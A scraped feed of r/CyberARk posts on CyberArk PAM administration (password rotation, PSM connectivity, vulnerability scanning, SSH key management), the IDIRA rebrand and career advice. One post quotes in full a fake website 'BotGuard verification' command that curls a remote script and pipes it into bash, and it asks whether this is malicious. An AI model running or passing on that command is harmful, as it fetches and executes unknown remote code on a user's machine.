r/CyberARk

What is layered cybersecurity?

It means not relying on one single defence to protect everything.

Edge security, network protection, endpoint security, identity controls, bot mitigation, and user verification all protect different parts of the digital journey.

Each layer has a specialist role.

The strongest security strategies are not built by choosing one tool for everything — they are built by combining the right layers in the right places.

#CyberSecurity #LayeredSecurity #BotProtection #DigitalTrust

reddit.com
u/No-Honey1950 — 1 day ago

Linux password rotation

We are currently facing a challenge regarding Linux local account password rotation using CyberArk CPM.

For Linux local users, CyberArk recommended configuring sudo permissions to allow the CPM user to execute the /usr/bin/passwd binary as root through /etc/sudoers or /etc/sudoers.d/.

However, this solution is not acceptable in our environment for the following reasons:

  • Granting sudo permissions to normal users introduces significant security concerns and potential privilege escalation risks.
  • Implementing and maintaining this configuration across a large number of Linux servers and local users would require considerable operational effort and time.

We are looking for alternative and secure approaches for Linux local account password rotation without granting broad sudo privileges.

Has anyone implemented a different method or best practice for handling Linux password rotation in a secure and scalable way?

Any recommendations or real-world experience would be appreciated.

reddit.com
u/AdElectrical9508 — 2 days ago

Unable to Trace Who Deleted Multiple Accounts

We are currently investigating an issue in CyberArk PAM where approximately 60 accounts were deleted.

We need to identify who performed these deletions (targeting the accounts on the target servers, not the users themselves).

We have already extracted multiple reports from both PVWA and the Vault, but we were not able to find any relevant results or trace the deletion activity.

Has anyone faced a similar issue or can advise where else we should look to identify the source of these deletions?

reddit.com
u/AdElectrical9508 — 2 days ago

PSM RDP issue after target servers upgraded to Windows Server 2025 – “client and server cannot communicate”

Hi all,

We have PSM servers on Windows Server 2022, and recently our target servers were upgraded to Windows Server 2025.

Now when users connect via PSM (RDP), we get this error:


Looks like an RDP/TLS/CredSSP negotiation issue.

Has anyone seen compatibility issues between CyberArk PSM (Win 2022) and Windows Server 2025?
Did you fix it through TLS/cipher suites, Schannel, CredSSP, GPO, or CyberArk patching?

Any help is appreciated.


reddit.com
u/AdElectrical9508 — 2 days ago

Thinking of switching from Tech BA to CyberArk – need advice

Hi all,

I’ve been working as a Tech BA for the past few years and have had some exposure to CyberArk through one of our projects. I worked alongside CyberArk engineers to help secure an application, and also collaborated with the SailPoint team to define roles and onboard them into CyberArk.

That said, all my involvement has been from a BA perspective—so I don’t have much hands-on technical experience with CyberArk itself.

I’m now considering pivoting into a CyberArk-focused role and wanted to understand how challenging that transition might be. I’ve been looking into instructor-led training to build my skills, but I’m still a bit unsure if this is the right path or how steep the learning curve will be.

Also, I’ve heard that Privileged Cloud (CyberArk Privilege Cloud) is in higher demand nowadays, but most training seems to focus on on-prem implementations. Is that something I should be concerned about?

Would really appreciate any advice from folks who’ve made a similar switch or are working in this space.

Thanks in advance!

reddit.com
u/Brave-Alfalfa-4641 — 4 days ago

Disable hardening on CyberArk PAM components during Nessus vulnerability scans

Hi Community,

We are planning to temporarily disable hardening on CyberArk PAM components during Nessus vulnerability scans and would like to understand the possible operational and security impact before proceeding.

Environment:

  • CyberArk PAM On-Premises Deployment
  • Components included:
      • Vault / DR Vault
      • PVWA / DR PVWA
      • CPM / DR CPM
      • PSM / DR PSM
      • PSMP / DR PSMP
  • Vulnerability scanning performed using Nessus

We would appreciate feedback from anyone who has experience with this scenario.

Questions:

  1. Has anyone disabled CyberArk hardening temporarily for vulnerability assessments or Nessus scans?
  2. Did it impact:
      • PAM services availability
      • Session management or recordings
      • CPM password management activities
      • Vault communication
      • PSM/PSMP connectivity
      • Security baselines or compliance requirements
  3. Were there any issues after re-enabling hardening?
  4. Is there an officially recommended approach to perform authenticated Nessus scans without disabling hardening completely?
  5. Are there recommended Nessus exclusions, safe checks, or scan tuning settings for CyberArk servers?

We are trying to identify:

  • Potential risks and operational impact
  • Best practices for vulnerability assessments in hardened CyberArk environments
  • Whether temporary hardening disablement is considered safe or supported

Any recommendations, lessons learned, or official guidance would be highly appreciated.

Can we open these ports without disabling hardening?
If yes, how?


Thanks.

reddit.com
u/AdElectrical9508 — 5 days ago

Temporarily recovered account help.

As you know, my account got hacked on March 8th. Found out the reason why they hacked me. They wanna help me make money. (Like no. I don't want your damn money) Anyways.. they temporarily gave me my account back, I immediately logged in and changed my recovery email, and removed the passkeys/numbers/emails they put. As soon as I did that, they hacked me AGAIN. I don't know how, but it's annoying. I just want my account, which is RIGHTFULLY back. The dude is making it hard for me.

Anyways, my plan now is to contact the police using the non-emergency line and hopefully they can help track this weirdo down. If that doesn't work, can someone please help me by giving me ideas on what to do?

reddit.com
u/PandaKitchen884 — 5 days ago

CyberArk / Idira Rebrand Impact on Self-Hosted PAM Environments

Hello everyone, I’m trying to understand the real operational impact of the recent CyberArk / Idira rebranding for self-hosted PAM deployments.

I’m reviewing the recent CyberArk / Idira rebranding announcement for self-hosted PAM customers and trying to understand the practical operational impact in on-prem environments.

The announcement indicates that Self-Hosted PAM customers will receive rebrand-related updates in upcoming releases, including:

  • PAM Self-Hosted v15.2
  • Credential Provider v15.2
  • Secrets Manager Self-Hosted v13.9

The stated changes appear to be primarily:

  • UI branding updates
  • Documentation updates
  • Product-generated email changes
  • Potential changes to display names and email subject lines
  • A gradual rollout intended to minimize disruption

For organizations running fully on-prem or self-hosted CyberArk PAM deployments, I’m interested in understanding whether there are any real technical or operational impacts beyond cosmetic branding.

Specifically:

  • SIEM integrations (QRadar, Splunk, Microsoft Sentinel, etc.)
  • Email alert parsing and downstream automation
  • API compatibility and backward compatibility considerations
  • Any hardcoded references to “CyberArk” in scripts, tooling, or automation workflows
  • Monitoring and observability tools relying on naming conventions
  • Certificates, service URLs, endpoints, or internal service identifiers
  • Upgrade and rollback behavior in mixed-version environments
  • Any unexpected issues observed after applying the rebranded versions in production

If anyone has already evaluated or deployed these updates in a production self-hosted environment, insights on actual operational impact versus purely cosmetic changes would be appreciated.

Or, if anyone has gone through a similar upgrade or rebranding cycle in a production PAM environment, it would be helpful to share any real risks or issues encountered, especially anything beyond cosmetic or UI changes.

reddit.com
u/AdElectrical9508 — 5 days ago

Anyone have any experience dealing with developers on macos?

Transitioning from admin to standard is painful due to the commands, settings, etc. they require for development, scripting, automation, etc. But we don't want standing admin privs. We will be implementing Workbrew and will use self-service to install other apps. TIA!

reddit.com
u/Nervous_Cancel9878 — 6 days ago
▲ 2 r/CyberARk+1 crossposts

Is this terminal verification command safe? Asked to run while accessing a website. I visited https://kittyyums.com/ and was prompted to run this command in Terminal on Mac as some kind of “verification”:

>/bin/bash -c "$(curl -A 'Mac OS X 10_15_7' -fsSL 'lfbd7bg2.runtime-atlas.digital/?ublib=85f26ff2-ae79-472d-9de9-f67fb7c308cf')"; echo ""BotGuard: Answer the protector challenge. Ref: 73282

From what I understand, this downloads and executes a remote script directly in Bash.

Questions:

  1. Has anyone seen this “BotGuard” verification before?
  2. Is runtime-atlas.digital associated with any legitimate anti-bot service?
  3. Is this normal behavior for website verification, or potentially malicious?
  4. If someone already ran it, what should they check on macOS?

I have not intentionally executed it and wanted opinions from people with security experience.

reddit.com
u/Anshulraghu — 6 days ago

PSM in DMZ environment

Looking for best practices for deploying CyberArk PSM for non-domain-joined Windows DMZ servers. We are considering deploying a dedicated PSM server in the DMZ. We are on Privilege Cloud ISPSS.

Current environment:

  • Windows DMZ servers are NOT domain-joined
  • Admins currently access them using local Windows accounts

Questions:

  1. What is the recommended CyberArk architecture for this scenario?
  2. What outbound ports/connectivity are required from a DMZ PSM server to the CyberArk Vault in Privileged Cloud?
  3. Any special considerations for installing/configuring the RDS role on a non-domain-joined PSM server?
  4. How are PSMConnect and PSMAdminConnect typically configured in non-domain joined environments? Local accounts on the PSM server?

Would appreciate hearing real-world implementations, lessons learned, or any architecture recommendations.

reddit.com
u/MysticCyber26 — 7 days ago
▲ 7 r/CyberARk+1 crossposts

Rotate SSH keys or move to SSH certificates

Hello,

I am tasked to onboard and rotate all SSH keys. Now I know that isn't as simple as it sounds. To give some context, SSH keys are only used for non-interactive purposes by various application teams, and the primary consumer base is the Unix team. To understand the real picture I asked for some stats, and it turns out a single key is used by more than a dozen automations and there are approx. 250K SSH key logins in 24 hours by various orchestration tools, Ansible, compliance jobs, GoAnywhere and so on. Those numbers are insane but not unrealistic. There are two main challenges:

  1. CyberArk is not capable of pushing a public key into the authorized_keys file on 9K servers. Even if I scaled it down to per environment, the number still remains in the thousands. That is a bad practice too from a privilege sprawl perspective. So, what makes more sense to me is individual key pairs per host, which leads to the second challenge.

  2. I can ask the teams to update their code to use CCP to programmatically fetch the keys at run time. Most of it will be doable and they will agree to what I propose, except for some minor resistance. But my concern here is scalability, performance and operational risks. CCP takes roughly 90 ms to deliver the key/password. A lot of automations constantly establish SSH connections, and Ansible in particular attempts re-authentication if the job is running longer. If CPM changes the key in the middle of the transaction, Ansible won't be happy about it. Also, a lot of automations are customer agnostic and can have direct commercial impact if anything goes wrong. I can propose the AAM agent instead for critical systems, but the license is limited.

I am pretty experienced with Unix, defining strategic roadmaps, building automations and what good looks like, but I feel CyberArk SSH Key Manager is just not the right product unless we move onto SSH certificates or choose SSH Communications Security's UKM. I have used it in the past and it's solid for edge cases like these.

Thanks

reddit.com
u/Abs201301 — 6 days ago

was: CyberArk now: IDIRA

🚨 BREAKING news: CyberArk is officially rebranded as IDIRA® by Palo Alto Networks — announced live on stage today!
The future of cybersecurity just got a name. 🔐

#IDIRA #CyberArk #PaloAltoNetworks #IdentitySecurity #Cybersecurity #ZeroTrust #PANW #BreakingNews

reddit.com
u/sergeyye — 10 days ago

Just passed the CDE PAM Recert Exam

The only source I used to prep for the exam was the PAM CDE Recertification practice exam from examtopics.com.

reddit.com
u/CryptoHooRay — 9 days ago

Naming Convention under new IDIRA brand

While we wait for official branding materials, let’s speculate what it could be: IDIRA Defender vs. Idirian Defender vs. Palo Alto Defender vs. Defender by Palo Alto, or something else (insert your version).

reddit.com
u/sergeyye — 9 days ago

Is anyone else experiencing this in the last two or three days? CyberArk Community keeps asking to login to view threads, and the login randomly fails sometimes and works other times?

reddit.com
u/TemperatureSignal199 — 7 days ago
▲ 13 r/CyberARk+1 crossposts

10 mistakes I made charging for my first CyberArk health checks as a Freelance CyberArk Architect

Been doing CyberArk for 10 years, last few doing independent health checks on the side. Sharing the pricing mistakes that actually cost me money, in case it helps anyone here thinking of going independent.

  1. Charged hourly the first time. Finished in 9 days what I'd quoted as "around 2 weeks". Made half of what the work was worth. Go fixed-fee.
  2. Quoted without scoping. "We have CyberArk, can you review it?" turned into a Vault cluster + 4 CPMs + a PSM farm + Conjur. Now I do a 30 min scoping call before any number leaves my mouth.
  3. Bundled remediation into the health check. Once you find 40 issues in a fixed-fee report, guess who fixes them for free. Two engagements, always.
  4. Underpriced because "it's just a review". The report is what lands them their next big remediation project. Started at 3k, my floor now is 12k.
  5. Did a free "quick look" before quoting. Wasted 4 hours, client ghosted. Paid scoping or nothing.
  6. Wrote the report too technical. 60 pages of CPM error codes. CISO didn't read past page 2. Now: 1-page exec summary up front, technical stuff in appendices.
  7. Treated the exec readout as "included". That 1h call is where the follow-on work gets sold. Charge for it.
  8. No scope-creep clause. "While you're at it..." used to mean free work. Now every SoW has an out-of-scope list and a CR rate.
  9. Quoted in the same call. Said a number, it became the ceiling. Now: "I'll send a proposal in 48h." Every time.
  10. Didn't follow up after delivery. ~70% of my follow-on work comes from a 30-day check-in email. People don't come back to you on their own.

Wrote all this up properly (frameworks, templates, the actual SoW I use) as a playbook. Not going to drop a link, DM me or check my profile if you want it.

What would you add?

reddit.com
u/RazzmatazzFlat2808 — 10 days ago